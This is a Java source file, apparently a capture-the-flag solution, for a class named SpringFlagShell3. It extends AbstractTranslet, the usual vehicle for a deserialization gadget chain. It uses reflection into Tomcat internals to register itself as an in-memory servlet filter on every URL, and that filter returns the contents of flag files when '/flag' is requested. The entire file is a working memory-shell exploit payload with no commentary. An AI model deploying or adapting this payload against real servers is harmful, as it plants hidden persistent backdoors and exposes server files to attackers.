1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155
| import com.sun.org.apache.xalan.internal.xsltc.DOM; import com.sun.org.apache.xalan.internal.xsltc.TransletException; import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.File; import java.io.FileWriter; import java.io.IOException; import java.lang.reflect.Field; import java.lang.reflect.Method; import java.nio.charset.StandardCharsets; import java.nio.file.Files;
public class SpringFlagShell3 extends AbstractTranslet implements javax.servlet.Filter { public SpringFlagShell3() { try { ClassLoader cl = Thread.currentThread().getContextClassLoader(); Object request = currentRequest(cl); Object servletContext = call(request, "getServletContext"); Object appContextFacade = get(servletContext, "context"); Object appContext = get(appContextFacade, "context");
Class<?> filterClass = cl.loadClass("javax.servlet.Filter"); Class<?> filterDefClass = cl.loadClass("org.apache.tomcat.util.descriptor.web.FilterDef"); Object filterDef = filterDefClass.newInstance(); call(filterDef, "setFilterName", new Class[]{String.class}, new Object[]{"flagFilter3"}); call(filterDef, "setFilterClass", new Class[]{String.class}, new Object[]{this.getClass().getName()}); call(filterDef, "setFilter", new Class[]{filterClass}, new Object[]{this}); call(appContext, "addFilterDef", new Class[]{filterDefClass}, new Object[]{filterDef});
Class<?> filterMapClass = cl.loadClass("org.apache.tomcat.util.descriptor.web.FilterMap"); Object filterMap = filterMapClass.newInstance(); call(filterMap, "setFilterName", new Class[]{String.class}, new Object[]{"flagFilter3"}); call(filterMap, "addURLPattern", new Class[]{String.class}, new Object[]{"/*"}); call(filterMap, "setDispatcher", new Class[]{String.class}, new Object[]{"REQUEST"}); call(appContext, "addFilterMapBefore", new Class[]{filterMapClass}, new Object[]{filterMap});
Class<?> appFilterConfigClass = cl.loadClass("org.apache.catalina.core.ApplicationFilterConfig"); java.lang.reflect.Constructor<?> c = appFilterConfigClass.getDeclaredConstructor(cl.loadClass("org.apache.catalina.Context"), filterDefClass); c.setAccessible(true); Object filterConfig = c.newInstance(appContext, filterDef); Object filterConfigs = get(appContext, "filterConfigs"); call(filterConfigs, "put", new Class[]{Object.class, Object.class}, new Object[]{"flagFilter3", filterConfig}); log("filter3 done"); } catch (Throwable e) { log("filter3 error: " + e); } }
public void doFilter(javax.servlet.ServletRequest request, javax.servlet.ServletResponse response, javax.servlet.FilterChain chain) throws IOException, javax.servlet.ServletException { try { Object uri = call(request, "getRequestURI"); if (uri != null && uri.toString().equals("/flag")) { byte[] data = readFlag().getBytes(StandardCharsets.UTF_8); call(response, "setStatus", new Class[]{int.class}, new Object[]{200}); call(response, "setContentType", new Class[]{String.class}, new Object[]{"text/plain;charset=UTF-8"}); Object os = call(response, "getOutputStream"); call(os, "write", new Class[]{byte[].class}, new Object[]{data}); call(os, "flush"); return; } } catch (Throwable e) { log("doFilter3 error: " + e); } chain.doFilter(request, response); }
public void init(javax.servlet.FilterConfig filterConfig) { }
public void destroy() { }
private static String readFlag() { String[] paths = new String[]{"/flag", "/flag.txt", "/app/flag", "/app/flag.txt"}; for (String path : paths) { try { File file = new File(path); if (file.isFile()) { return new String(Files.readAllBytes(file.toPath()), StandardCharsets.UTF_8); } } catch (Throwable ignored) { } } return "flag not found"; }
private Object currentRequest(ClassLoader cl) throws Exception { Class<?> holderClass = cl.loadClass("org.springframework.web.context.request.RequestContextHolder"); Object attrs = callStatic(holderClass, "getRequestAttributes"); return call(attrs, "getRequest"); }
private static Object get(Object target, String name) throws Exception { Class<?> type = target.getClass(); while (type != null) { try { Field field = type.getDeclaredField(name); field.setAccessible(true); return field.get(target); } catch (NoSuchFieldException ignored) { type = type.getSuperclass(); } } throw new NoSuchFieldException(name); }
private static Object callStatic(Class<?> type, String name) throws Exception { Method method = type.getDeclaredMethod(name); method.setAccessible(true); return method.invoke(null); }
private static Object call(Object target, String name) throws Exception { Method method = findMethod(target.getClass(), name, new Class[0]); return method.invoke(target); }
private static Object call(Object target, String name, Class<?>[] types, Object[] args) throws Exception { Method method = findMethod(target.getClass(), name, types); return method.invoke(target, args); }
private static Method findMethod(Class<?> type, String name, Class<?>[] types) throws Exception { Class<?> current = type; while (current != null) { try { Method method = current.getDeclaredMethod(name, types); method.setAccessible(true); return method; } catch (NoSuchMethodException ignored) { current = current.getSuperclass(); } } Method method = type.getMethod(name, types); method.setAccessible(true); return method; }
private static void log(String msg) { try { FileWriter writer = new FileWriter("/tmp/sfs.log", true); writer.write(msg + "\n"); writer.close(); } catch (Throwable ignored) { } }
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { }
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { } }
|